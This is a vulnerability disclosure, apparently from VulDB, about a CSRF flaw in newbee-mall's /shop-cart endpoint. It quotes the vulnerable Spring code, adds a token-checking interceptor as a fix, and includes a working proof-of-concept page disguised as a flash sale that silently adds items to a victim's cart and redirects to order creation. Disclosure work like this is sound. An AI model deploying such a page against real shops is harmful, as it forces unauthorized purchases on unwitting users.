| Title | newbee-ltd newbee-mall v1.0 CSRF |
|---|---|

**Description**:

# CSRF Vulnerability in Shopping Cart Item Addition
## Summary
A **CSRF vulnerability** exists in the shopping cart addition endpoint `/shop-cart` (POST). Attackers can add arbitrary items to users' shopping carts, which can be chained with the order creation CSRF to force unauthorized purchases.
## Vulnerability Details
### Configuration-Level Issue
**File**: `src/main/java/ltd/newbee/mall/config/NeeBeeMallWebMvcConfigurer.java`
```java
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.context.annotation.Configuration;
import org.springframework.web.servlet.config.annotation.InterceptorRegistry;
import org.springframework.web.servlet.config.annotation.WebMvcConfigurer;

@Configuration
public class NeeBeeMallWebMvcConfigurer implements WebMvcConfigurer {

    @Autowired
    private NewBeeMallLoginInterceptor newBeeMallLoginInterceptor; // only checks that a logged-in user exists in the session

    @Override
    public void addInterceptors(InterceptorRegistry registry) {
        registry.addInterceptor(newBeeMallLoginInterceptor)
                .addPathPatterns("/shop-cart/**");
        // ❌ No CSRF token validation configured
    }
}
```
### Endpoint-Level Code Analysis
**File**: `src/main/java/ltd/newbee/mall/controller/mall/ShoppingCartController.java` (Lines 63-76)
```java
@PostMapping("/shop-cart")
@ResponseBody
public Result saveNewBeeMallShoppingCartItem(@RequestBody NewBeeMallShoppingCartItem newBeeMallShoppingCartItem,
                                             HttpSession httpSession) {
    NewBeeMallUserVO user = (NewBeeMallUserVO) httpSession.getAttribute(Constants.MALL_USER_SESSION_KEY);
    newBeeMallShoppingCartItem.setUserId(user.getUserId());
    // ❌ No CSRF token validation
    // ⚠️ Accepts JSON payload from any origin
    String saveResult = newBeeMallShoppingCartService.saveNewBeeMallCartItem(newBeeMallShoppingCartItem);
    if (ServiceResultEnum.SUCCESS.getResult().equals(saveResult)) {
        return ResultGenerator.genSuccessResult();
    }
    return ResultGenerator.genFailResult(saveResult);
}
```
**Security Issues**:
1. ❌ No CSRF token validation
2. ⚠️ Accepts cross-site JSON requests that carry the victim's session cookie (`credentials: include`)
3. ⚠️ Can be chained with the order creation CSRF for a full forced-purchase attack
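As an added example that is not code from the newbee-mall project, the following Spring MVC interceptor shows the missing check: state-changing requests must echo a random token that lives only in the victim's session, which a cross-site page can neither read nor guess. It assumes Spring Boot 2.x with `javax.servlet`, a hypothetical session attribute `csrfToken` populated at login via `newToken()`, and a front end that sends the token in a hypothetical `X-CSRF-TOKEN` header.

```java
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import java.security.SecureRandom;
import java.util.Base64;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import javax.servlet.http.HttpSession;
import org.springframework.web.servlet.HandlerInterceptor;

// Added example, not newbee-mall code: a cross-site page can make the browser
// send the session cookie, but it cannot read this session-bound token.
public class CsrfTokenInterceptor implements HandlerInterceptor {

    static final String SESSION_CSRF_KEY = "csrfToken"; // hypothetical session attribute
    static final String HEADER_NAME = "X-CSRF-TOKEN";   // hypothetical header set by the front end

    /** Generate once at login and store the value under SESSION_CSRF_KEY. */
    static String newToken() {
        byte[] raw = new byte[32];
        new SecureRandom().nextBytes(raw);
        return Base64.getUrlEncoder().withoutPadding().encodeToString(raw);
    }

    @Override
    public boolean preHandle(HttpServletRequest request, HttpServletResponse response, Object handler) {
        String method = request.getMethod();
        if ("GET".equals(method) || "HEAD".equals(method) || "OPTIONS".equals(method)) {
            return true; // reads cannot add cart items or create orders
        }
        HttpSession session = request.getSession(false);
        Object expected = session == null ? null : session.getAttribute(SESSION_CSRF_KEY);
        if (!isValid(expected, request.getHeader(HEADER_NAME))) {
            response.setStatus(HttpServletResponse.SC_FORBIDDEN); // stop before the controller runs
            return false;
        }
        return true;
    }

    /** Constant-time comparison; a missing or non-String token fails closed. */
    static boolean isValid(Object expected, String presented) {
        if (!(expected instanceof String) || presented == null) {
            return false;
        }
        return MessageDigest.isEqual(((String) expected).getBytes(StandardCharsets.UTF_8),
                                     presented.getBytes(StandardCharsets.UTF_8));
    }
}
// Register alongside the login interceptor in NeeBeeMallWebMvcConfigurer.addInterceptors():
//   registry.addInterceptor(new CsrfTokenInterceptor()).addPathPatterns("/shop-cart/**", "/saveOrder");
```

The check does not depend on the browser's CORS preflight (which a cross-origin `Content-Type: application/json` request would normally trigger), so the cart and order endpoints stay protected even where CORS is configured permissively.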
## Proof of Concept (PoC)
```html
<!DOCTYPE html>
<html>
<head>
  <title>Special Offer - Limited Time!</title>
</head>
<body>
  <h1>Flash Sale! 90% OFF</h1>
  <p>Adding special offers to your cart...</p>
  <script>
    // Add expensive items to victim's shopping cart
    var itemsToAdd = [
      {goodsId: 10047, goodsCount: 5},  // Expensive item 1
      {goodsId: 10048, goodsCount: 10}, // Expensive item 2
      {goodsId: 10049, goodsCount: 3}   // Expensive item 3
    ];
    itemsToAdd.forEach(function(item) {
      fetch('http://localhost:28089/shop-cart', {
        method: 'POST',
        credentials: 'include',
        headers: {
          'Content-Type': 'application/json'
        },
        body: JSON.stringify(item)
      })
      .then(response => response.json())
      .then(data => console.log('Added item:', item.goodsId));
    });
    // Step 2: Redirect to order creation (chain attack)
    setTimeout(function() {
      window.location.href = 'http://localhost:28089/saveOrder';
    }, 2000);
  </script>
</body>
</html>
```
## Impact
**Unauthorized shopping cart manipulation leading to forced purchases**: when combined with the order creation CSRF, attackers can force users to buy unwanted expensive items.
---
**CVSS Score**: 7.6 (High)

| Source | https://github.com/newbee-ltd/newbee-mall/issues/110 |
|---|---|
| User | flashzyc (UID 92850) |
| Submitted | 05/02/2026 11:54 (4 months ago) |
| Moderated | 18/02/2026 07:56 (13 days later) |
| Status | Duplicate |
| VulDB Entry | 346456 [newbee-ltd newbee-mall up to a069069b07027613bf0e7f571736be86f431faee Multiple Endpoints cross-site request forgery] |
| Points | 0 |